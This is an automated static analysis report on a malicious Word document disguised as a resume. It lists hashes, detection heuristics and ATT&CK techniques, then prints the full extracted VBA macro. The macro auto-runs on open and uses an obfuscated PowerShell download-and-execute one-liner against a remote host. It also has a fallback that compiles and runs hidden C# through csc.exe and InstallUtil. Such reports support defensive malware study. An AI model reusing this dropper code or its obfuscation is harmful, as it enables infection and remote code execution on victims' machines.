Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3778737d251d8faf…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 1.25 MB
Created: 2018-05-04 10:16:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 68cee0aa77911b98d7cdf22e177c05d8
SHA-1: d453439358ffdd5944ed65b8fd38381ea77a294f
SHA-256: 3778737d251d8faff9386d8cf18fcdc25ad392b6f9ea9ed3baaf66bb96d54988
Risk Score: 550

Malware Insights

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample contains a Document_Open VBA macro that uses CreateObject and WScript.Shell to execute obfuscated commands. The macro is designed to download and run a second-stage payload from a remote URL, as indicated by the 'Obfuscated VBA Shell command with URL' heuristic. References to PowerShell and the VirtualAlloc API further suggest malicious execution capabilities. The document body itself appears to be a resume, likely used as a lure to entice the user to open the malicious document.

Heuristics (14)

  • ClamAV: Doc.Dropper.Agent-6529908-0 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6529908-0
  • VBA macros detected (severity: medium, 7 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical, OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
    R = uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ + " -w 1 /C "" &( $env:pUBlic[13]+$Env:PuBlic[5]+\""x\"")( (\""I\""+\""EX((n\""+\""ew-obj\""+\""e\""+\""ct\""+\"" net.webc\""+\""lien\""+\""t)\""+\"".dow\""+\""nloadstr\""+\""ing(\""+\""B8Qh\""+\""ttp://1static-im\""+\""ag\""+\""es.\""+\""com/s\""+\""uppor\""+\""t/\""+\""B8Q\""+\""))\"").rePlace(\""B8Q\"",[stRIng][CHaR]39) )"""
    Shell R, 0
    End Sub
  • WScript.Shell usage (severity: critical, OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched line in script
    Dim obj As Object
    Set obj = CreateObject("WScript.Shell")
  • LOLBin reference in VBA (severity: critical, OLE_VBA_LOLBIN)
    LOLBin reference in VBA
    Matched line in script
    imians = "csc.exe /unsafe /out:""" & border & "\" & "package.exe"" "
    heading = "InstallUtil.exe /logtoconsole=false /logfile= /U """ & border & "\package.exe"""
    T = location_pw & imians & """" & out & """"
  • Obfuscated VBA Shell command with URL (severity: critical, OLE_VBA_OBFUSCATED_SHELL_URL)
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    R = uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ + " -w 1 /C "" &( $env:pUBlic[13]+$Env:PuBlic[5]+\""x\"")( (\""I\""+\""EX((n\""+\""ew-obj\""+\""e\""+\""ct\""+\"" net.webc\""+\""lien\""+\""t)\""+\"".dow\""+\""nloadstr\""+\""ing(\""+\""B8Qh\""+\""ttp://1static-im\""+\""ag\""+\""es.\""+\""com/s\""+\""uppor\""+\""t/\""+\""B8Q\""+\""))\"").rePlace(\""B8Q\"",[stRIng][CHaR]39) )"""
    Shell R, 0
    End Sub
  • CreateObject call (severity: high, OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    Dim Http
    Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
    If Http Is Nothing Then Set Http = CreateObject("WinHttp.WinHttpRequest")
  • VBA p-code auto-exec with execution tokens (severity: high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (severity: low, OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub Document_Open()
    EventOnOpen
  • Reference to PowerShell (severity: high, SC_STR_POWERSHELL)
    Reference to PowerShell
  • Reference to Windows Script Host (severity: high, SC_STR_WSCRIPT)
    Reference to Windows Script Host
  • Clipboard command execution lure (severity: high, SE_CLIPBOARD_COMMAND_LURE)
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • Reference to VirtualAlloc API (severity: medium, SC_STR_VIRTUALALLOC)
    Reference to VirtualAlloc API
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.michellebaxter.com/cvprofile.png (referenced by macro)
    • http://www.michellebaxter.com/profile.png (referenced by macro)
    • http://ns.1static-images.com/profile.png (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4317 bytes
SHA-256: 47c5ea6c002e06a1b10c2cf2cebfc431269cb96447c60949bcb5614810f067ee
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
EventOnOpen
End Sub

Sub Document_Close()
EventOnClose
End Sub

Public Sub EventOnOpen()

ActiveDocument.Unprotect Password:="password"

ShowContent

EventWait

Track
'WriteFileContentAndRun

End Sub

Public Sub EventOnClose()

HideContent

ActiveDocument.Protect Password:="password", NoReset:=True, Type:= _
wdAllowOnlyReading, UseIRM:=False, EnforceStyleLock:=False

ActiveDocument.Save
 
End Sub

Private Sub ShowContent()
ActiveDocument.Tables(1).Range.Font.Hidden = False
ActiveDocument.Tables(2).Range.Font.Hidden = True
End Sub

Private Sub HideContent()
ActiveDocument.Tables(1).Range.Font.Hidden = True
ActiveDocument.Tables(2).Range.Font.Hidden = False
End Sub

Function FileExists(ByVal FileToTest As String) As Boolean
FileExists = (Dir(FileToTest) <> "")
End Function

Sub DeleteFile(ByVal FileToDelete As String)
If FileExists(FileToDelete) Then
SetAttr FileToDelete, vbNormal
Kill FileToDelete
End If
End Sub

Private Sub EventWait()
Dim AvILoveYou
AvILoveYou = DateAdd("s", 2, Now())
Dim i
i = 0
Do Until (Now() > AvILoveYou)

If ActiveDocument.Shapes.Count > 0 Then
k = ActiveDocument.Shapes.Count
For Index = 1 To k - 1
' do nothing
Next Index
End If
Loop
End Sub

Private Sub Track()
On Error GoTo Dns
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
If Http Is Nothing Then Set Http = CreateObject("WinHttp.WinHttpRequest")
If Http Is Nothing Then Set Http = CreateObject("MSXML2.ServerXMLHTTP")
If Http Is Nothing Then Set Http = CreateObject("Microsoft.XMLHTTP")
Http.Open "GET", "http://www.michellebaxter.com/profile.png", False
Http.Send
Http.Open "GET", "http://ns.1static-images.com/profile.png", False
Http.Send

Http: Oneliner
Exit Sub

Dns: WriteFileContentAndRun


End Sub


Private Sub Oneliner()
wcHmZZVmEnETxCUBVwZXevnOVae = "pow"
PMzqbMwFcachvmluYwwwhkfBFJdDiXwkjWryDHcViQnvXMrKkCsXZRsLZxPNXHUpUoofiv = "ersh"
rYAkgYIgTyjzWsOVfHmmiWBkafJSzfaaENblYLYofvuJzO = "ell"
uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ = (wcHmZZVmEnETxCUBVwZXevnOVae + PMzqbMwFcachvmluYwwwhkfBFJdDiXwkjWryDHcViQnvXMrKkCsXZRsLZxPNXHUpUoofiv + rYAkgYIgTyjzWsOVfHmmiWBkafJSzfaaENblYLYofvuJzO)
R = uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ + " -w 1 /C "" &( $env:pUBlic[13]+$Env:PuBlic[5]+\""x\"")( (\""I\""+\""EX((n\""+\""ew-obj\""+\""e\""+\""ct\""+\"" net.webc\""+\""lien\""+\""t)\""+\"".dow\""+\""nloadstr\""+\""ing(\""+\""B8Qh\""+\""ttp://1static-im\""+\""ag\""+\""es.\""+\""com/s\""+\""uppor\""+\""t/\""+\""B8Q\""+\""))\"").rePlace(\""B8Q\"",[stRIng][CHaR]39) )"""
Shell R, 0
End Sub

Private Sub WriteFileContentAndRun()

Dim textbox, text
Dim business As String
Dim location_pw As String

business = "C:\Windows\Microsoft.NET\Framework\"
If FileExists(business & "v4.0.30319\csc.exe") Then
location_pw = business & "v4.0.30319\"
Else
' try something else
Exit Sub
End If

Set textbox = ActiveDocument.Shapes("Text Box 31")
If Not (textbox Is Nothing) Then
text = textbox.TextFrame.TextRange.text
Else
Exit Sub
End If

Dim obj As Object
Set obj = CreateObject("WScript.Shell")

Dim objFolders As Object
Set objFolders = obj.SpecialFolders

Dim out
Dim border
border = objFolders("mydocuments")
out = border & "\" & "package.cs"

Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(out)
oFile.WriteLine text
oFile.Close
Set fso = Nothing
Set oFile = Nothing
       
Dim cm As String
Dim b As String
b = "a*"
Dim imians As String
Dim heading As String
imians = "csc.exe /unsafe /out:""" & border & "\" & "package.exe"" "
heading = "InstallUtil.exe /logtoconsole=false /logfile= /U """ & border & "\package.exe"""
T = location_pw & imians & """" & out & """"
Q = location_pw & heading

Shell T, 0
EventWait

Shell Q, 0
EventWait

DeleteFile (out)

End Sub